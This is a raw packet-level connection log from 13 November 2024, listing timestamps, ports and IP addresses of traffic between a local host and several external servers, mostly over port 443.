Nov 13, 2024 20:39:42.203181982 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.203181982 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.203249931 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.203258038 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.203258038 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.203283072 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.203285933 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.203298092 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.205027103 CET	49853	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.205046892 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.205070972 CET	49853	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.205085993 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.206960917 CET	49880	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.206984043 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.207184076 CET	49880	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.207407951 CET	49880	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.207417965 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.207976103 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.208019972 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.208158970 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.208168983 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.208177090 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.208234072 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.208343029 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.208364010 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.208374977 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.208383083 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.235857010 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.236339092 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.236366034 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.236753941 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.236759901 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.290910006 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.291251898 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.291280985 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.291698933 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.291721106 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.291759968 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.291768074 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.291785002 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.291807890 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.292314053 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.295636892 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.295701027 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.295850992 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.339334965 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.363104105 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.363261938 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.363404989 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.363454103 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.363481045 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.363506079 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.363518953 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.367258072 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.367294073 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.367392063 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.367701054 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.367727995 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.385226965 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.385238886 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.401154995 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:42.401695013 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:42.401707888 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:42.402616024 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:42.402693033 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:42.403641939 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:42.403693914 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:42.424360037 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:42.424792051 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:42.424806118 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:42.426229000 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:42.426343918 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:42.427135944 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:42.427217007 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:42.482651949 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:42.482741117 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:42.482856989 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:42.483412027 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:42.483445883 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:42.538969994 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.539032936 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.539048910 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.542872906 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.542932034 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.542939901 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.547498941 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:42.547516108 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:42.547535896 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:42.547553062 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:42.551290989 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.551392078 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.551403046 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.560255051 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.560323000 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.560331106 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.604934931 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.605541945 CET	49874	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.605585098 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.606201887 CET	49874	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.606213093 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.655536890 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.655606031 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.655616045 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.657515049 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.657685041 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.657692909 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.659245014 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:42.659265041 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:42.659991980 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.660038948 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.660046101 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.670439005 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.670579910 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.670588017 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.676979065 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.677151918 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.677160025 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.720561981 CET	49887	443	192.168.2.5	2.23.209.176
Nov 13, 2024 20:39:42.720649004 CET	443	49887	2.23.209.176	192.168.2.5
Nov 13, 2024 20:39:42.720731974 CET	49887	443	192.168.2.5	2.23.209.176
Nov 13, 2024 20:39:42.720864058 CET	49887	443	192.168.2.5	2.23.209.176
Nov 13, 2024 20:39:42.720874071 CET	443	49887	2.23.209.176	192.168.2.5
Nov 13, 2024 20:39:42.735016108 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.735083103 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.735289097 CET	49874	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.770358086 CET	49874	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.770370960 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.772665024 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.772725105 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.772743940 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.775156021 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.775207043 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.775216103 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.777388096 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.777441978 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.777451992 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.784327984 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.784365892 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.784611940 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.785515070 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.785581112 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.785588980 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.794563055 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.794627905 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.794650078 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.794677019 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.794725895 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.816843033 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.816881895 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.851058960 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.891835928 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.891931057 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.891985893 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.892011881 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.892075062 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.894107103 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.899599075 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.899641991 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.899652004 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.906019926 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.906085968 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.906096935 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.911494017 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.911647081 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.911657095 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.957943916 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.958632946 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.958713055 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.959362030 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.959377050 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.961556911 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.962069988 CET	49880	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.962093115 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.962476969 CET	49880	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.962481976 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.968251944 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.968334913 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:42.968348026 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:42.976403952 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.976764917 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.976788998 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.977174044 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.977180004 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.007258892 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.007333040 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.007343054 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.009459019 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.009533882 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.009542942 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.017965078 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.018039942 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.018049002 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.023878098 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.023930073 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.023938894 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.031097889 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.031151056 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.031158924 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.058425903 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:43.058510065 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:43.074270964 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.083158970 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.091440916 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.091599941 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.091773987 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.092782974 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.092818022 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.092849016 CET	49881	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.092864990 CET	443	49881	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.096601963 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.096635103 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.096739054 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.097376108 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.097392082 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.100590944 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.100794077 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.101180077 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.101246119 CET	49880	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.101253986 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.101290941 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.101682901 CET	49880	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.101700068 CET	443	49880	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.101748943 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.101768017 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.103918076 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.103974104 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.104064941 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.104383945 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.104414940 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.112015963 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.112076998 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.112124920 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.112142086 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.112186909 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.112232924 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.113255978 CET	49882	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.113264084 CET	443	49882	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.115446091 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.115458965 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.115739107 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.115854025 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.115868092 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.126658916 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:43.126836061 CET	49887	443	192.168.2.5	2.23.209.176
Nov 13, 2024 20:39:43.126864910 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:43.126869917 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:43.126945019 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:43.126945972 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:43.126991034 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:43.141952991 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.142112970 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.142123938 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.142215014 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.142318010 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.142409086 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.142436981 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.142446995 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.142462969 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.142564058 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.142638922 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.142647028 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.149605036 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.149640083 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.149648905 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.149662018 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.149703979 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.162581921 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:43.167330980 CET	443	49887	2.23.209.176	192.168.2.5
Nov 13, 2024 20:39:43.167409897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:43.200475931 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.233637094 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.233736038 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.233948946 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.234040976 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.234040976 CET	49883	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.234086037 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.234119892 CET	443	49883	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.237453938 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.237484932 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.237550974 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.238672972 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.238682032 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.241389036 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.241457939 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.241473913 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259340048 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259380102 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259406090 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259413958 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.259433031 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259457111 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.259465933 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259504080 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.259510994 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259598970 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.259634972 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.259641886 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.263264894 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.263328075 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.263339043 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.317703009 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.317754030 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.317778111 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.359112024 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.359181881 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.359196901 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.376676083 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.376749039 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.376763105 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.376888037 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.376940012 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.376949072 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.377073050 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.377130032 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.377137899 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.380510092 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.380590916 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.380606890 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.434772968 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.434845924 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.434864044 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.476244926 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.476320982 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.476336002 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.476442099 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.476495981 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.476505041 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.493678093 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.493738890 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.493753910 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.493895054 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.494004965 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.494149923 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.494213104 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.494213104 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.494225025 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.494353056 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:43.494405985 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.494510889 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:43.494525909 CET	443	49857	142.250.185.97	192.168.2.5
